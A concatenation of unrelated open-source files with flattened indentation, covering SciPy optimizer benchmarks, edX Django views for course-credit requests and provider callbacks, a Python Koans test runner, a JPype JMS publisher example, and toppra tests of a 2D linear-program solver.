def bench_run(self, x0, methods=None, **minimizer_kwargs):
"""do an optimization test starting at x0 for all the optimizers"""
kwargs = self.minimizer_kwargs
if methods is None:
methods = ["COBYLA", 'Powell', 'nelder-mead',
'L-BFGS-B', 'BFGS', 'CG', 'TNC', 'SLSQP',
"Newton-CG", 'dogleg', 'trust-ncg', 'trust-exact',
'trust-krylov', 'trust-constr']
# L-BFGS-B, BFGS, trust-constr can use gradients, but examine
# performance when numerical differentiation is used.
fonly_methods = ["COBYLA", 'Powell', 'nelder-mead', 'L-BFGS-B', 'BFGS',
'trust-constr']
for method in fonly_methods:
if method not in methods:
continue
t0 = time.time()
res = scipy.optimize.minimize(self.fun, x0, method=method,
**kwargs)
t1 = time.time()
self.add_result(res, t1-t0, method)
gradient_methods = ['L-BFGS-B', 'BFGS', 'CG', 'TNC', 'SLSQP',
'trust-constr']
if self.der is not None:
for method in gradient_methods:
if method not in methods:
continue
t0 = time.time()
res = scipy.optimize.minimize(self.fun, x0, method=method,
jac=self.der, **kwargs)
t1 = time.time()
self.add_result(res, t1-t0, method)
hessian_methods = ["Newton-CG", 'dogleg', 'trust-ncg',
'trust-exact', 'trust-krylov', 'trust-constr']
if self.hess is not None:
for method in hessian_methods:
if method not in methods:
continue
t0 = time.time()
res = scipy.optimize.minimize(self.fun, x0, method=method,
jac=self.der, hess=self.hess,
**kwargs)
t1 = time.time()
self.add_result(res, t1-t0, method)
class BenchSmoothUnbounded(Benchmark):
"""Benchmark the optimizers with smooth, unbounded, functions"""
params = [
['rosenbrock_slow', 'rosenbrock_nograd', 'rosenbrock', 'rosenbrock_tight',
'simple_quadratic', 'asymmetric_quadratic',
'sin_1d', 'booth', 'beale', 'LJ'],
["COBYLA", 'Powell', 'nelder-mead',
'L-BFGS-B', 'BFGS', 'CG', 'TNC', 'SLSQP',
"Newton-CG", 'dogleg', 'trust-ncg', 'trust-exact',
'trust-krylov', 'trust-constr'],
["mean_nfev", "mean_time"]
]
param_names = ["test function", "solver", "result type"]
def setup(self, func_name, method_name, ret_val):
b = getattr(self, 'run_' + func_name)(methods=[method_name])
r = b.average_results().get(method_name)
if r is None:
raise NotImplementedError()
self.result = getattr(r, ret_val)
def track_all(self, func_name, method_name, ret_val):
return self.result
# SlowRosen has a 50us delay on each function evaluation. By comparing to
# rosenbrock_nograd it should be possible to figure out how much time a
# minimizer uses internally, compared to the time required for function
# evaluation.
def run_rosenbrock_slow(self, methods=None):
s = funcs.SlowRosen()
b = _BenchOptimizers("Rosenbrock function",
fun=s.fun)
for i in range(10):
b.bench_run(np.random.uniform(-3, 3, 3), methods=methods)
return b
# see what the performance of the solvers are if numerical differentiation
# has to be used.
def run_rosenbrock_nograd(self, methods=None):
b = _BenchOptimizers("Rosenbrock function",
fun=rosen)
for i in range(10):
b.bench_run(np.random.uniform(-3, 3, 3), methods=methods)
return b
def run_rosenbrock(self, methods=None):
b = _BenchOptimizers("Rosenbrock function",
fun=rosen, der=rosen_der, hess=rosen_hess)
for i in range(10):
b.bench_run(np.random.uniform(-3, 3, 3), methods=methods)
return b
def run_rosenbrock_tight(self, methods=None):
b = _BenchOptimizers("Rosenbrock function",
fun=rosen, der=rosen_der, hess=rosen_hess,
tol=1e-8)
for i in range(10):
b.bench_run(np.random.uniform(-3, 3, 3), methods=methods)
return b
def run_simple_quadratic(self, methods=None):
s = funcs.SimpleQuadratic()
# print "checking gradient", scipy.optimize.check_grad(s.fun, s.der, np.array([1.1, -2.3]))
b = _BenchOptimizers("simple quadratic function",
fun=s.fun, der=s.der, hess=s.hess)
for i in range(10):
b.bench_run(np.random.uniform(-2, 2, 3), methods=methods)
return b
def run_asymmetric_quadratic(self, methods=None):
s = funcs.AsymmetricQuadratic()
# print "checking gradient", scipy.optimize.check_grad(s.fun, s.der, np.array([1.1, -2.3]))
b = _BenchOptimizers("function sum(x**2) + x[0]",
fun=s.fun, der=s.der, hess=s.hess)
for i in range(10):
b.bench_run(np.random.uniform(-2, 2, 3), methods=methods)
return b
def run_sin_1d(self, methods=None):
fun = lambda x: np.sin(x[0])
der = lambda x: np.array([np.cos(x[0])])
b = _BenchOptimizers("1d sin function",
fun=fun, der=der, hess=None)
for i in range(10):
b.bench_run(np.random.uniform(-2, 2, 1), methods=methods)
return b
def run_booth(self, methods=None):
s = funcs.Booth()
# print "checking gradient", scipy.optimize.check_grad(s.fun, s.der, np.array([1.1, -2.3]))
b = _BenchOptimizers("Booth's function",
fun=s.fun, der=s.der, hess=None)
for i in range(10):
b.bench_run(np.random.uniform(0, 10, 2), methods=methods)
return b
def run_beale(self, methods=None):
s = funcs.Beale()
# print "checking gradient", scipy.optimize.check_grad(s.fun, s.der, np.array([1.1, -2.3]))
b = _BenchOptimizers("Beale's function",
fun=s.fun, der=s.der, hess=None)
for i in range(10):
b.bench_run(np.random.uniform(0, 10, 2), methods=methods)
return b
def run_LJ(self, methods=None):
s = funcs.LJ()
# print "checking gradient", scipy.optimize.check_grad(s.get_energy, s.get_gradient,
# np.random.uniform(-2,2,3*4))
natoms = 4
b = _BenchOptimizers("%d atom Lennard Jones potential" % (natoms),
fun=s.fun, der=s.der, hess=None)
for i in range(10):
b.bench_run(np.random.uniform(-2, 2, natoms*3), methods=methods)
return b
class BenchLeastSquares(Benchmark):
"""Class for benchmarking nonlinear least squares solvers."""
problems = extract_lsq_problems()
params = [
list(problems.keys()),
["average time", "nfev", "success"]
]
param_names = [
"problem", "result type"
]
def track_all(self, problem_name, result_type):
problem = self.problems[problem_name]
if problem.lb is not None or problem.ub is not None:
raise NotImplementedError
ftol = 1e-5
if result_type == 'average time':
n_runs = 10
t0 = time.time()
for _ in range(n_runs):
leastsq(problem.fun, problem.x0, Dfun=problem.jac, ftol=ftol,
full_output=True)
return (time.time() - t0) / n_runs
x, cov_x, info, message, ier = leastsq(
problem.fun, problem.x0, Dfun=problem.jac,
ftol=ftol, full_output=True
)
if result_type == 'nfev':
return info['nfev']
elif result_type == 'success':
return int(problem.check_answer(x, ftol))
else:
raise NotImplementedError
try:
# the value of SCIPY_XSLOW is used to control how many repeats of each
# function
slow = int(os.environ.get('SCIPY_XSLOW', 0))
except ValueError:
pass
_func_names = os.environ.get('SCIPY_GLOBAL_BENCH', [])
if _func_names:
if not slow:
slow = 100
_func_names = [x.strip() for x in _func_names.split(',')]
class BenchGlobal(Benchmark):
"""
Benchmark the global optimizers using the go_benchmark_functions
suite
"""
timeout = 300
_functions = OrderedDict([
item for item in inspect.getmembers(gbf, inspect.isclass)
if (issubclass(item[1], gbf.Benchmark) and
item[0] not in ('Benchmark') and
not item[0].startswith('Problem'))
])
if _func_names:
_filtered_funcs = OrderedDict()
for name in _func_names:
if name in _functions:
_filtered_funcs[name] = _functions.get(name)
_functions = _filtered_funcs
if not slow:
_functions = {'AMGM': None}
params = [
list(_functions.keys()),
["success%", "<nfev>"],
['DE', 'basinh.', 'DA'],
]
param_names = ["test function", "result type", "solver"]
def __init__(self):
self.enabled = bool(slow)
self.numtrials = slow
self.dump_fn = os.path.join(os.path.dirname(__file__), '..', 'global-bench-results.json')
self.results = {}
def setup(self, name, ret_value, solver):
if not self.enabled:
print("BenchGlobal.track_all not enabled --- export SCIPY_XSLOW=slow to enable,\n"
"'slow' iterations of each benchmark will be run.\n"
"Note that it can take several hours to run; intermediate output\n"
"can be found under benchmarks/global-bench-results.json\n"
"You can specify functions to benchmark via SCIPY_GLOBAL_BENCH=AMGM,Adjiman,...")
raise NotImplementedError()
# load json backing file
with open(self.dump_fn, 'r') as f:
self.results = json.load(f)
def teardown(self, name, ret_value, solver):
with open(self.dump_fn, 'w') as f:
json.dump(self.results, f, indent=2, sort_keys=True)
def track_all(self, name, ret_value, solver):
if name in self.results and solver in self.results[name]:
# have we done the function, and done the solver?
# if so, then just return the ret_value
av_results = self.results[name]
if ret_value == 'success%':
return 100 * av_results[solver]['nsuccess'] / av_results[solver]['ntrials']
elif ret_value == '<nfev>':
return av_results[solver]['mean_nfev']
else:
raise ValueError()
klass = self._functions[name]
f = klass()
try:
b = _BenchOptimizers.from_funcobj(name, f)
with np.errstate(all='ignore'):
b.bench_run_global(methods=[solver],
numtrials=self.numtrials)
av_results = b.average_results()
if name not in self.results:
self.results[name] = {}
self.results[name][solver] = av_results[solver]
if ret_value == 'success%':
return 100 * av_results[solver]['nsuccess'] / av_results[solver]['ntrials']
elif ret_value == '<nfev>':
return av_results[solver]['mean_nfev']
else:
raise ValueError()
except Exception:
print("".join(traceback.format_exc()))
self.results[name] = "".join(traceback.format_exc())
def setup_cache(self):
if not self.enabled:
return
# create the logfile to start with
with open(self.dump_fn, 'w') as f:
json.dump({}, f, indent=2)
| bsd-3-clause |
4eek/edx-platform | openedx/core/djangoapps/credit/views.py | 9 | 13671 | """
Views for the credit Django app.
"""
import json
import datetime
import logging
from django.conf import settings
from django.http import (
HttpResponse,
HttpResponseBadRequest,
HttpResponseForbidden,
Http404
)
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST, require_GET
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
import pytz
from rest_framework import viewsets, mixins, permissions, authentication
from util.json_request import JsonResponse
from util.date_utils import from_timestamp
from openedx.core.djangoapps.credit import api
from openedx.core.djangoapps.credit.exceptions import CreditApiBadRequest, CreditRequestNotFound
from openedx.core.djangoapps.credit.models import CreditCourse
from openedx.core.djangoapps.credit.serializers import CreditCourseSerializer
from openedx.core.djangoapps.credit.signature import signature, get_shared_secret_key
log = logging.getLogger(__name__)
@require_GET
def get_providers_detail(request):
"""
**User Cases**
Returns details of the credit providers filtered by provided query parameters.
**Parameters:**
* provider_id (list of provider ids separated with ","): The identifiers for the providers for which
user requested
**Example Usage:**
GET /api/credit/v1/providers?provider_id=asu,hogwarts
"response": [
"id": "hogwarts",
"display_name": "Hogwarts School of Witchcraft and Wizardry",
"url": "https://credit.example.com/",
"status_url": "https://credit.example.com/status/",
"description": "A new model for the Witchcraft and Wizardry School System.",
"enable_integration": false,
"fulfillment_instructions": "
<p>In order to fulfill credit, Hogwarts School of Witchcraft and Wizardry requires learners to:</p>
<ul>
<li>Sample instruction abc</li>
<li>Sample instruction xyz</li>
</ul>",
},
...
]
**Responses:**
* 200 OK: The request was created successfully. Returned content
is a JSON-encoded dictionary describing what the client should
send to the credit provider.
* 404 Not Found: The provider does not exist.
"""
provider_id = request.GET.get("provider_id", None)
providers_list = provider_id.split(",") if provider_id else None
providers = api.get_credit_providers(providers_list)
return JsonResponse(providers)
@require_POST
def create_credit_request(request, provider_id):
"""
Initiate a request for credit in a course.
This end-point will get-or-create a record in the database to track
the request. It will then calculate the parameters to send to
the credit provider and digitally sign the parameters, using a secret
key shared with the credit provider.
The user's browser is responsible for POSTing these parameters
directly to the credit provider.
**Example Usage:**
POST /api/credit/v1/providers/hogwarts/request/
{
"username": "ron",
"course_key": "edX/DemoX/Demo_Course"
}
Response: 200 OK
Content-Type: application/json
{
"url": "http://example.com/request-credit",
"method": "POST",
"parameters": {
request_uuid: "557168d0f7664fe59097106c67c3f847"
timestamp: 1434631630,
course_org: "ASUx"
course_num: "DemoX"
course_run: "1T2015"
final_grade: "0.95",
user_username: "john",
user_email: "john@example.com"
user_full_name: "John Smith"
user_mailing_address: "",
user_country: "US",
signature: "cRCNjkE4IzY+erIjRwOQCpRILgOvXx4q2qvx141BCqI="
}
}
**Parameters:**
* username (unicode): The username of the user requesting credit.
* course_key (unicode): The identifier for the course for which the user
is requesting credit.
**Responses:**
* 200 OK: The request was created successfully. Returned content
is a JSON-encoded dictionary describing what the client should
send to the credit provider.
* 400 Bad Request:
- The provided course key did not correspond to a valid credit course.
- The user already has a completed credit request for this course and provider.
* 403 Not Authorized:
- The username does not match the name of the logged in user.
- The user is not eligible for credit in the course.
* 404 Not Found:
- The provider does not exist.
"""
response, parameters = _validate_json_parameters(request.body, ["username", "course_key"])
if response is not None:
return response
try:
course_key = CourseKey.from_string(parameters["course_key"])
except InvalidKeyError:
return HttpResponseBadRequest(
u'Could not parse "{course_key}" as a course key'.format(
course_key=parameters["course_key"]
)
)
# Check user authorization
if not (request.user and request.user.username == parameters["username"]):
log.warning(
u'User with ID %s attempted to initiate a credit request for user with username "%s"',
request.user.id if request.user else "[Anonymous]",
parameters["username"]
)
return HttpResponseForbidden("Users are not allowed to initiate credit requests for other users.")
# Initiate the request
try:
credit_request = api.create_credit_request(course_key, provider_id, parameters["username"])
except CreditApiBadRequest as ex:
return HttpResponseBadRequest(ex)
else:
return JsonResponse(credit_request)
@require_POST
@csrf_exempt
def credit_provider_callback(request, provider_id):
"""
Callback end-point used by credit providers to approve or reject
a request for credit.
**Example Usage:**
POST /api/credit/v1/providers/{provider-id}/callback
{
"request_uuid": "557168d0f7664fe59097106c67c3f847",
"status": "approved",
"timestamp": 1434631630,
"signature": "cRCNjkE4IzY+erIjRwOQCpRILgOvXx4q2qvx141BCqI="
}
Response: 200 OK
**Parameters:**
* request_uuid (string): The UUID of the request.
* status (string): Either "approved" or "rejected".
* timestamp (int or string): The datetime at which the POST request was made, represented
as the number of seconds since January 1, 1970 00:00:00 UTC.
If the timestamp is a string, it will be converted to an integer.
* signature (string): A digital signature of the request parameters,
created using a secret key shared with the credit provider.
**Responses:**
* 200 OK: The user's status was updated successfully.
* 400 Bad request: The provided parameters were not valid.
Response content will be a JSON-encoded string describing the error.
* 403 Forbidden: Signature was invalid or timestamp was too far in the past.
* 404 Not Found: Could not find a request with the specified UUID associated with this provider.
"""
response, parameters = _validate_json_parameters(request.body, [
"request_uuid", "status", "timestamp", "signature"
])
if response is not None:
return response
# Validate the digital signature of the request.
# This ensures that the message came from the credit provider
# and hasn't been tampered with.
response = _validate_signature(parameters, provider_id)
if response is not None:
return response
# Validate the timestamp to ensure that the request is timely.
response = _validate_timestamp(parameters["timestamp"], provider_id)
if response is not None:
return response
# Update the credit request status
try:
api.update_credit_request_status(parameters["request_uuid"], provider_id, parameters["status"])
except CreditRequestNotFound:
raise Http404
except CreditApiBadRequest as ex:
return HttpResponseBadRequest(ex)
else:
return HttpResponse()
@require_GET
def get_eligibility_for_user(request):
"""
**User Cases**
Retrieve user eligibility against course.
**Parameters:**
* course_key (unicode): Identifier of course.
* username (unicode): Username of current User.
**Example Usage:**
GET /api/credit/v1/eligibility?username=user&course_key=edX/Demo_101/Fall
"response": {
"course_key": "edX/Demo_101/Fall",
"deadline": "2015-10-23"
}
**Responses:**
* 200 OK: The request was created successfully.
* 404 Not Found: The provider does not exist.
"""
course_key = request.GET.get("course_key", None)
username = request.GET.get("username", None)
return JsonResponse(api.get_eligibilities_for_user(username=username, course_key=course_key))
def _validate_json_parameters(params_string, expected_parameters):
"""
Load the request parameters as a JSON dictionary and check that
all required paramters are present.
Arguments:
params_string (unicode): The JSON-encoded parameter dictionary.
expected_parameters (list): Required keys of the parameters dictionary.
Returns: tuple of (HttpResponse, dict)
"""
try:
parameters = json.loads(params_string)
except (TypeError, ValueError):
return HttpResponseBadRequest("Could not parse the request body as JSON."), None
if not isinstance(parameters, dict):
return HttpResponseBadRequest("Request parameters must be a JSON-encoded dictionary."), None
missing_params = set(expected_parameters) - set(parameters.keys())
if missing_params:
msg = u"Required parameters are missing: {missing}".format(missing=u", ".join(missing_params))
return HttpResponseBadRequest(msg), None
return None, parameters
def _validate_signature(parameters, provider_id):
"""
Check that the signature from the credit provider is valid.
Arguments:
parameters (dict): Parameters received from the credit provider.
provider_id (unicode): Identifier for the credit provider.
Returns:
HttpResponseForbidden or None
"""
secret_key = get_shared_secret_key(provider_id)
if secret_key is None:
log.error(
(
u'Could not retrieve secret key for credit provider with ID "%s". '
u'Since no key has been configured, we cannot validate requests from the credit provider.'
), provider_id
)
return HttpResponseForbidden("Credit provider credentials have not been configured.")
if signature(parameters, secret_key) != parameters["signature"]:
log.warning(u'Request from credit provider with ID "%s" had an invalid signature', parameters["signature"])
return HttpResponseForbidden("Invalid signature.")
def _validate_timestamp(timestamp_value, provider_id):
"""
Check that the timestamp of the request is recent.
Arguments:
timestamp (int or string): Number of seconds since Jan. 1, 1970 UTC.
If specified as a string, it will be converted to an integer.
provider_id (unicode): Identifier for the credit provider.
Returns:
HttpResponse or None
"""
timestamp = from_timestamp(timestamp_value)
if timestamp is None:
msg = u'"{timestamp}" is not a valid timestamp'.format(timestamp=timestamp_value)
log.warning(msg)
return HttpResponseBadRequest(msg)
# Check that the timestamp is recent
elapsed_seconds = (datetime.datetime.now(pytz.UTC) - timestamp).total_seconds()
if elapsed_seconds > settings.CREDIT_PROVIDER_TIMESTAMP_EXPIRATION:
log.warning(
(
u'Timestamp %s is too far in the past (%s seconds), '
u'so we are rejecting the notification from the credit provider "%s".'
),
timestamp_value, elapsed_seconds, provider_id,
)
return HttpResponseForbidden(u"Timestamp is too far in the past.")
class CreditCourseViewSet(mixins.CreateModelMixin, mixins.UpdateModelMixin, viewsets.ReadOnlyModelViewSet):
""" CreditCourse endpoints. """
lookup_field = 'course_key'
lookup_value_regex = settings.COURSE_KEY_REGEX
queryset = CreditCourse.objects.all()
serializer_class = CreditCourseSerializer
authentication_classes = (authentication.OAuth2Authentication, authentication.SessionAuthentication,)
permission_classes = (permissions.IsAuthenticated, permissions.IsAdminUser)
# This CSRF exemption only applies when authenticating without SessionAuthentication.
# SessionAuthentication will enforce CSRF protection.
@method_decorator(csrf_exempt)
def dispatch(self, request, *args, **kwargs):
# Convert the course ID/key from a string to an actual CourseKey object.
course_id = kwargs.get(self.lookup_field, None)
if course_id:
kwargs[self.lookup_field] = CourseKey.from_string(course_id)
return super(CreditCourseViewSet, self).dispatch(request, *args, **kwargs)
| agpl-3.0 |
sjb3/python_koans | python2/runner/sensei.py | 51 | 9889 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
import re
import sys
import os
import glob
import helper
from mockable_test_result import MockableTestResult
from runner import path_to_enlightenment
from libs.colorama import init, Fore, Style
init() # init colorama
class Sensei(MockableTestResult):
def __init__(self, stream):
unittest.TestResult.__init__(self)
self.stream = stream
self.prevTestClassName = None
self.tests = path_to_enlightenment.koans()
self.pass_count = 0
self.lesson_pass_count = 0
self.all_lessons = None
def startTest(self, test):
MockableTestResult.startTest(self, test)
if helper.cls_name(test) != self.prevTestClassName:
self.prevTestClassName = helper.cls_name(test)
if not self.failures:
self.stream.writeln()
self.stream.writeln("{0}{1}Thinking {2}".format(
Fore.RESET, Style.NORMAL, helper.cls_name(test)))
if helper.cls_name(test) not in ['AboutAsserts', 'AboutExtraCredit']:
self.lesson_pass_count += 1
def addSuccess(self, test):
if self.passesCount():
MockableTestResult.addSuccess(self, test)
self.stream.writeln( \
" {0}{1}{2} has expanded your awareness.{3}{4}" \
.format(Fore.GREEN, Style.BRIGHT, test._testMethodName, \
Fore.RESET, Style.NORMAL))
self.pass_count += 1
def addError(self, test, err):
# Having 1 list for errors and 1 list for failures would mess with
# the error sequence
self.addFailure(test, err)
def passesCount(self):
return not (self.failures and helper.cls_name(self.failures[0][0]) !=
self.prevTestClassName)
def addFailure(self, test, err):
MockableTestResult.addFailure(self, test, err)
def sortFailures(self, testClassName):
table = list()
for test, err in self.failures:
if helper.cls_name(test) == testClassName:
m = re.search("(?<= line )\d+" ,err)
if m:
tup = (int(m.group(0)), test, err)
table.append(tup)
if table:
return sorted(table)
else:
return None
def firstFailure(self):
if not self.failures: return None
table = self.sortFailures(helper.cls_name(self.failures[0][0]))
if table:
return (table[0][1], table[0][2])
else:
return None
def learn(self):
self.errorReport()
self.stream.writeln("")
self.stream.writeln("")
self.stream.writeln(self.report_progress())
if self.failures:
self.stream.writeln(self.report_remaining())
self.stream.writeln("")
self.stream.writeln(self.say_something_zenlike())
if self.failures: sys.exit(-1)
self.stream.writeln(
"\n{0}**************************************************" \
.format(Fore.RESET))
self.stream.writeln("\n{0}That was the last one, well done!" \
.format(Fore.MAGENTA))
self.stream.writeln(
"\nIf you want more, take a look at about_extra_credit_task.py")
def errorReport(self):
problem = self.firstFailure()
if not problem: return
test, err = problem
self.stream.writeln(" {0}{1}{2} has damaged your "
"karma.".format(Fore.RED, Style.BRIGHT, test._testMethodName))
self.stream.writeln("\n{0}{1}You have not yet reached enlightenment ..." \
.format(Fore.RESET, Style.NORMAL))
self.stream.writeln("{0}{1}{2}".format(Fore.RED, \
Style.BRIGHT, self.scrapeAssertionError(err)))
self.stream.writeln("")
self.stream.writeln("{0}{1}Please meditate on the following code:" \
.format(Fore.RESET, Style.NORMAL))
self.stream.writeln("{0}{1}{2}{3}{4}".format(Fore.YELLOW, Style.BRIGHT, \
self.scrapeInterestingStackDump(err), Fore.RESET, Style.NORMAL))
def scrapeAssertionError(self, err):
if not err: return ""
error_text = ""
count = 0
for line in err.splitlines():
m = re.search("^[^^ ].*$",line)
if m and m.group(0):
count+=1
if count>1:
error_text += (" " + line.strip()).rstrip() + '\n'
return error_text.strip('\n')
def scrapeInterestingStackDump(self, err):
if not err:
return ""
lines = err.splitlines()
sep = '@@@@@SEP@@@@@'
stack_text = ""
for line in lines:
m = re.search("^ File .*$",line)
if m and m.group(0):
stack_text += '\n' + line
m = re.search("^ \w(\w)+.*$",line)
if m and m.group(0):
stack_text += sep + line
lines = stack_text.splitlines()
stack_text = ""
for line in lines:
m = re.search("^.*[/\\\\]koans[/\\\\].*$",line)
if m and m.group(0):
stack_text += line + '\n'
stack_text = stack_text.replace(sep, '\n').strip('\n')
stack_text = re.sub(r'(about_\w+.py)',
r"{0}\1{1}".format(Fore.BLUE, Fore.YELLOW), stack_text)
stack_text = re.sub(r'(line \d+)',
r"{0}\1{1}".format(Fore.BLUE, Fore.YELLOW), stack_text)
return stack_text
def report_progress(self):
return "You have completed {0} koans and " \
"{1} lessons.".format(
self.pass_count,
self.lesson_pass_count)
def report_remaining(self):
koans_remaining = self.total_koans() - self.pass_count
lessons_remaining = self.total_lessons() - self.lesson_pass_count
return "You are now {0} koans and {1} lessons away from " \
"reaching enlightenment.".format(
koans_remaining,
lessons_remaining)
# Hat's tip to Tim Peters for the zen statements from The 'Zen
# of Python' (http://www.python.org/dev/peps/pep-0020/)
#
# Also a hat's tip to Ara T. Howard for the zen statements from his
# metakoans Ruby Quiz (http://rubyquiz.com/quiz67.html) and
# Edgecase's later permutation in the Ruby Koans
def say_something_zenlike(self):
if self.failures:
turn = self.pass_count % 37
zenness = "";
if turn == 0:
zenness = "Beautiful is better than ugly."
elif turn == 1 or turn == 2:
zenness = "Explicit is better than implicit."
elif turn == 3 or turn == 4:
zenness = "Simple is better than complex."
elif turn == 5 or turn == 6:
zenness = "Complex is better than complicated."
elif turn == 7 or turn == 8:
zenness = "Flat is better than nested."
elif turn == 9 or turn == 10:
zenness = "Sparse is better than dense."
elif turn == 11 or turn == 12:
zenness = "Readability counts."
elif turn == 13 or turn == 14:
zenness = "Special cases aren't special enough to " \
"break the rules."
elif turn == 15 or turn == 16:
zenness = "Although practicality beats purity."
elif turn == 17 or turn == 18:
zenness = "Errors should never pass silently."
elif turn == 19 or turn == 20:
zenness = "Unless explicitly silenced."
elif turn == 21 or turn == 22:
zenness = "In the face of ambiguity, refuse the " \
"temptation to guess."
elif turn == 23 or turn == 24:
zenness = "There should be one-- and preferably only " \
"one --obvious way to do it."
elif turn == 25 or turn == 26:
zenness = "Although that way may not be obvious at " \
"first unless you're Dutch."
elif turn == 27 or turn == 28:
zenness = "Now is better than never."
elif turn == 29 or turn == 30:
zenness = "Although never is often better than right " \
"now."
elif turn == 31 or turn == 32:
zenness = "If the implementation is hard to explain, " \
"it's a bad idea."
elif turn == 33 or turn == 34:
zenness = "If the implementation is easy to explain, " \
"it may be a good idea."
else:
zenness = "Namespaces are one honking great idea -- " \
"let's do more of those!"
return "{0}{1}{2}{3}".format(Fore.CYAN, zenness, Fore.RESET, Style.NORMAL);
else:
return "{0}Nobody ever expects the Spanish Inquisition." \
.format(Fore.CYAN)
# Hopefully this will never ever happen!
return "The temple is collapsing! Run!!!"
def total_lessons(self):
all_lessons = self.filter_all_lessons()
if all_lessons:
return len(all_lessons)
else:
return 0
def total_koans(self):
return self.tests.countTestCases()
def filter_all_lessons(self):
cur_dir = os.path.split(os.path.realpath(__file__))[0]
if not self.all_lessons:
self.all_lessons = glob.glob('{0}/../koans/about*.py'.format(cur_dir))
self.all_lessons = filter(lambda filename:
"about_extra_credit" not in filename,
self.all_lessons)
return self.all_lessons
| mit |
tomaslaz/Analysis-Toolkit | thirdparty/JPype-0.5.4.2/examples/jms/testJpypePublisher.py | 4 | 1213 | from jpype import *
import time
NUMMSGS = 10
def pyPublisher (javaNamingFactory="weblogic.jndi.WLInitialContextFactory",
javaNamingProvider="t3://158.188.40.21:7001",
connectionFactory="weblogic.jms.ConnectionFactory",
topicName="defaultTopic"):
return messaging.JpypePublisher(javaNamingFactory,javaNamingProvider,
connectionFactory,topicName)
## Startup Jpype and import the messaging java package
startJVM("C:\\program files\\Java\\j2re1.4.2_02\\bin\\client\\jvm.dll",
"-Djava.class.path=D:/jIRAD/JpypeJMS/src;D:/jIRAD/JpypeJMS/classes;C:/bea/weblogic81/server/lib/weblogic.jar")
messaging = JPackage('messaging')
# Get a publisher
publisher = pyPublisher()
## Timing test
# The "Start" message signals the subscriber to start timing message receipts
publisher.publish("Start")
t0 = time.time()
for i in range(NUMMSGS):
publisher.publish("Hello World! %s"%i)
print "MessageRate =",float(NUMMSGS)/(time.time()-t0)
# The "Stop" message signals the subscriber to stop timing message receipts
publisher.publish("Stop")
# Close and quit
publisher.close()
shutdownJVM()
| gpl-3.0 |
hungpham2511/toppra | tests/tests/lpsolvers/seidel/test_lp2d.py | 1 | 8272 | import toppra.solverwrapper.cy_seidel_solverwrapper as seidel
import numpy as np
from numpy import array
import pytest
import cvxpy as cvx
testdata_correct = [
([1, 2, 3.0], None, None, None, [-1, -1], [1, 1], [-1, 1],
1, 6, [1, 1], [-2, -4]),
([-2, 2, 2.0], None, None, None, [-1, -1], [1, 1], [-1, 1],
1, 6, [-1, 1], [-1, -4]),
([1, 2, 3], (1, -1), (1, 1), (-1, -0.5), [-1, -1], [1, 1], [-1, -1],
1, 4.75, [0.25, 0.75], [0, 1]),
([-1, 0.01, 0], (1, -1), (1, 1), (-1, -0.5), [-1, -1], [1, 1], [-1, -1],
1, 0.995, [-1, -0.5], [-1, 1]),
([1, 2, 0],
(1.36866544, 1.28199038, -0.19515422, 0.97578149, 0.64391477,
-0.0811908, -0.70696349, -1.01804875, 0.5742392, 0.02939029),
(0.1969094, 1.13910161, 0.10109674, 1.71246466, -0.45206747,
-0.51302219, -1.16558797, 0.19919171, -0.906885, 0.94722345),
(-2.68926068, -1.59762444, -2.03337493, -2.04617298, -1.09241401,
-1.67319798, -1.9483617, -1.57529407, -1.37795315, -3.47919232), [-100, -100], [100, 100],
[0, 1], 1, 2.5547484757095305, [-1.18181729266432, 1.8682828841869252], [3, 7]),
([1, 2, 0],
(1.36866544, 1.28199038, -0.19515422, 0.97578149, 0.64391477,
-0.0811908, -0.70696349, -1.01804875, 0.5742392, 0.02939029),
(0.1969094, 1.13910161, 0.10109674, 1.71246466, -0.45206747,
-0.51302219, -1.16558797, 0.19919171, -0.906885, 0.94722345),
(-2.68926068, -1.59762444, -2.03337493, -2.04617298, -1.09241401,
-1.67319798, -1.9483617, -1.57529407, -1.37795315, -3.47919232), [-100, -100], [100, 100],
[5, 9], 1, 2.5547484757095305, [-1.18181729266432, 1.8682828841869252], [3, 7]),
([1, 2, 0], [-0.01, 0.01], [-1, 1], [0, 0.5],
[-1, -1], [1, 1], [0, 1], 0, None, None, None)
]
testids_correct = [
"fixbound1",
"fixbound2",
"two_constraints",
"two_constraints",
"random_10_c_warms",
"random_10_c_warms",
"bug"
]
@pytest.mark.parametrize("v, a, b, c, low, high, active_c,"
"res_expected, optval_expected, optvar_expected, active_c_expected",
testdata_correct, ids=testids_correct)
def test_correct(v, a, b, c, low, high, active_c, res_expected, optval_expected,
optvar_expected, active_c_expected):
"""Test a few correct instances."""
if a is None:
a_np = None
b_np = None
c_np = None
else:
a_np = np.array(a, dtype=float)
b_np = np.array(b, dtype=float)
c_np = np.array(c, dtype=float)
data = seidel.solve_lp2d(np.array(v, dtype=float), a_np, b_np, c_np,
np.array(low, dtype=float), np.array(high, dtype=float), np.array(active_c, dtype=int))
res, optval, optvar, active_c = data
if res_expected == 1:
assert res == res_expected
np.testing.assert_allclose(optval, optval_expected)
np.testing.assert_allclose(optvar, optvar_expected)
assert set(active_c) == set(active_c_expected)
else:
assert res == res_expected
@pytest.mark.parametrize("seed", range(100))
def test_random_constraints(seed):
"""Generate random problem data, solve with cvxpy and then compare!
Generated problems can be feasible or infeasible. Both cases are
tested in this unit test."""
# generate random problem data
d = 50
np.random.seed(seed)
seeds = np.random.randint(1000, size=7)
np.random.seed(seeds[0])
v = np.random.randn(3)
np.random.seed(seeds[1])
a, b = np.random.randn(2, d)
np.random.seed(seeds[2])
if seed % 2 == 0:
c = - np.random.rand(d)
else:
c = np.random.randn(d)
low = np.r_[-0.5, -0.9]
high = np.r_[0.5, 0.9]
np.random.seed(seeds[3])
active_c = np.random.choice(d, size=2)
# solve with cvxpy
x = cvx.Variable(2)
constraints = [a * x[0] + b * x[1] + c <= 0,
low <= x, x <= high]
obj = cvx.Maximize(v[0] * x[0] + v[1] * x[1] + v[2])
prob = cvx.Problem(obj, constraints)
prob.solve(solver='CVXOPT')
# solve with the method to test and assert correctness
data = seidel.solve_lp2d(v, a, b, c, low, high, active_c)
res, optval, optvar, active_c = data
if prob.status == "optimal":
assert res == 1
np.testing.assert_allclose(optval, prob.value, atol=1e-6)
np.testing.assert_allclose(optvar, np.asarray(x.value).flatten(), atol=1e-6)
elif prob.status == "infeasible":
assert res == 0
else:
